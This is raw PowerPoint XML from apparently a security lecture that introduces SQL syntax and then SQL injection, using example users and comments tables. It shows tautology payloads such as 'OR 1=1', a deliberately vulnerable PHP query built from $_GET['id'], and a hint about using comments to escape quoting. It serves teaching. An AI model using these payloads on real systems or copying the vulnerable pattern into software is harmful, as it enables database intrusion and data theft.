              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, ... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" baseline="-25000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" baseline="-25000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)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114300" y="3088957"/>
            <a:ext cx="8572500" cy="1189411"/>
            <a:chOff x="114300" y="3088957"/>
            <a:chExt cx="8572500" cy="1189411"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rounded Rectangular Callout 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="114300" y="3612889"/>
              <a:ext cx="1181100" cy="398779"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 43531"/>
                <a:gd name="adj2" fmla="val 100092"/>
                <a:gd name="adj3" fmla="val 1666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smallint</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rounded Rectangular Callout 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4419600" y="3088957"/>
              <a:ext cx="1600200" cy="375285"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 18705"/>
                <a:gd name="adj2" fmla="val 139199"/>
                <a:gd name="adj3" fmla="val 1666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varchar</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>(15)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Right Brace 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="5257800" y="849368"/>
              <a:ext cx="533400" cy="6324600"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:headEnd type="none"/>
              <a:tailEnd type="non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76134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876300" y="1828800"/>
            <a:ext cx="7391400" cy="15240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fr-FR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We’re</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>done</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Crypto!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635934" y="3581400"/>
            <a:ext cx="5943602" cy="914400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000" dirty="0"/>
              <a:t>Key concepts like authentication, integrity, man-in-the-middle attacks, etc. will still be important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277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A05C-7D88-9E4B-B6AC-1CE35ACF5DD7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630679" y="5791200"/>
            <a:ext cx="5943602" cy="914400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/>
              <a:t>A schema is a collection of tables</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>with their intended relations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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254508"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="941294" y="914400"/>
          <a:ext cx="7772402" cy="18542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97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4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46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46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46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09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user_id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first_name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last_name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password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avatar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&lt;hash 1&gt;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admin.jpg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Gordon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gordonb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&lt;hash</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> 2&gt;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gordonb.jpg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&lt;hash 3&gt;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hacker.jpg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059581" y="2743200"/>
            <a:ext cx="956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users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463369"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2551398" y="3420035"/>
          <a:ext cx="4041204" cy="18542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97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5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user_id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comment_id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Test</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> Comment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like sugar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But not milk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Gordon</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> is silly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744565" y="5274235"/>
            <a:ext cx="1654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comments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1219200" y="2743200"/>
            <a:ext cx="1332198" cy="676835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61357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895600"/>
            <a:ext cx="6858000" cy="3810000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t> can either be:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>List of comma-separated column names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>“*” for all columns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t> is a comma-separated list of tables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t> is a Boolean SQL expression</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>Single quotes for strings (‘’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>Integers are specified in the normal way</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>Comments are specified:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>Single line: ‘--’ (two dashes) character</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>Multi-line: “/*” and “*/” (like C)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>Server-specific, e.g., “#” single-line comment for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Cambria"/>
              <a:cs typeface="Cambria"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Cambria"/>
              <a:cs typeface="Cambria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21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609600" y="1219200"/>
            <a:ext cx="7924800" cy="6858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1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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SELECT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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>columns&gt;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from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 err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>db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&gt; </a:t>
            </a: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where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 err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>exp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&gt;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2057400"/>
            <a:ext cx="8458200" cy="685800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Returns all rows from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> columns where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is true</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="242144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Query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22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099818"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4325855" y="3124200"/>
          <a:ext cx="4041204" cy="18542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97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5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user_id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comment_id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Test</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> Comment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like sugar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But not milk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Gordon</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> is silly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519022" y="4953000"/>
            <a:ext cx="1654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comments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04800" y="3124200"/>
            <a:ext cx="3886200" cy="1066800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r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>select * from comments where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> = 2; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Down Arrow 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="4267200"/>
            <a:ext cx="381000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow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800" y="4953000"/>
            <a:ext cx="3733800" cy="1219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1"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2, 2, “I like sugar”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2, 3, “But not milk”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09600" y="1219200"/>
            <a:ext cx="7924800" cy="6858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1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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SELECT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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>columns&gt;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from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 err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>db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&gt; </a:t>
            </a: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where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 err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>exp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235671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23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322955"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3904219" y="3403600"/>
          <a:ext cx="4558759" cy="18542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97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2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user_id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comment_id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Test</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> Comment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like sugar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But not milk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Gordon</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> is silly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267447" y="2286001"/>
            <a:ext cx="3466353" cy="3043534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r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>users.first_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>comments.comment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> from users, comments where </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>users.user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>comments.user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>users.user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> = 2;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5492377"/>
            <a:ext cx="3733800" cy="1219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1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gordon“I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> like sugar”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gordon“But</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> not milk”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09600" y="1219200"/>
            <a:ext cx="7924800" cy="6858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1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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SELECT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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>columns&gt;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from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 err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>db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&gt; </a:t>
            </a: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where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 err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>exp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&gt;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824763"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3904219" y="2133600"/>
          <a:ext cx="5163581" cy="111252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97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4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9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2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user_id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first_name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last_name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Gordon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gordonb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Rounded Rectangular Callout 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419600" y="5329535"/>
            <a:ext cx="3124200" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -86687"/>
              <a:gd name="adj2" fmla="val -158290"/>
              <a:gd name="adj3" fmla="val 16667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Join two tables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38001272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Tautologies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24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050672"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4325855" y="3124200"/>
          <a:ext cx="4041204" cy="18542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97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5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user_id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comment_id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Test</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> Comment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like sugar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But not milk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Gordon</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> is silly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519022" y="4953000"/>
            <a:ext cx="1654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comments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04800" y="2514600"/>
            <a:ext cx="3886200" cy="1752600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r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>select * from comments where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> = 2 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng" dirty="0"/>
              <a:t>OR 1= 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>;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04800" y="4343400"/>
            <a:ext cx="3733800" cy="2438400"/>
            <a:chOff x="304800" y="4343400"/>
            <a:chExt cx="3733800" cy="2438400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Down Arrow 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1905000" y="4343400"/>
              <a:ext cx="381000" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="downArrow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 anchor="ctr" anchorCtr="1">
              <a:no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4800" y="4876800"/>
              <a:ext cx="3733800" cy="1905000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 anchorCtr="1">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>1, 1, “Test Comment”</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>2, 2, “I like sugar”</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>2, 3, “But not milk”</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>3, 4, “Gordon is silly”</a:t>
              </a:r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609600" y="1219200"/>
            <a:ext cx="7924800" cy="6858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1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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SELECT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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>columns&gt;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from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 err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>db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&gt; </a:t>
            </a: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where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 err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>exp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&gt;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724400" y="5638800"/>
            <a:ext cx="3276600" cy="854075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Tautologies often used in real attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2181368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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Snip Single Corner Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="862106" y="152400"/>
            <a:ext cx="7543800" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="snip1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t" anchorCtr="1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$id = $_GET['id'];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"SELECT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first_name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last_name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FROM users </a:t>
            </a:r>
            <a:b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</a:b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	    WHERE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user_id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$id";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$result =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mysql_query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($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) or die('&lt;pre&gt;' .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mysql_error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() . '&lt;/pre&gt;' );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228600" y="3148106"/>
            <a:ext cx="4648200" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 13561"/>
              <a:gd name="adj2" fmla="val -159313"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst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Guess as to the exploit?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27782992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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Snip Single Corner Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="862106" y="152400"/>
            <a:ext cx="7543800" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="snip1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t" anchorCtr="1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$id = $_GET['id'];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"SELECT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first_name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last_name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FROM users </a:t>
            </a:r>
            <a:b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</a:b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	    WHERE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user_id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$id";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$result =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mysql_query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($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) or die('&lt;pre&gt;' .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mysql_error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() . '&lt;/pre&gt;' );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5167406" y="3910106"/>
            <a:ext cx="3238500" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 15490"/>
              <a:gd name="adj2" fmla="val -255391"/>
              <a:gd name="adj3" fmla="val 16667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Solution: 1 or 1=1;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Screen Shot 2012-07-02 at 2.33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900" y="2286000"/>
            <a:ext cx="41021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6374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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Snip Single Corner Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="862106" y="152400"/>
            <a:ext cx="7543800" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="snip1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t" anchorCtr="1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$id = $_GET['id'];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"SELECT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first_name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last_name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FROM users </a:t>
            </a:r>
            <a:b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</a:b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	    WHERE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user_id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‘$id’";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$result =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mysql_query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($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) or die('&lt;pre&gt;' .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mysql_error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() . '&lt;/pre&gt;' );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228600" y="3148106"/>
            <a:ext cx="4648200" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 13561"/>
              <a:gd name="adj2" fmla="val -159313"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst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Does quoting make it safe?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881094" y="4572000"/>
            <a:ext cx="6805706" cy="1524001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Hint: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>Comments are specified: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>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>Single line: ‘--’ (two dashes) character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>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>Multi-line: “/*” and “*/” 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>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>“#” single-line comment for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"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600928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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
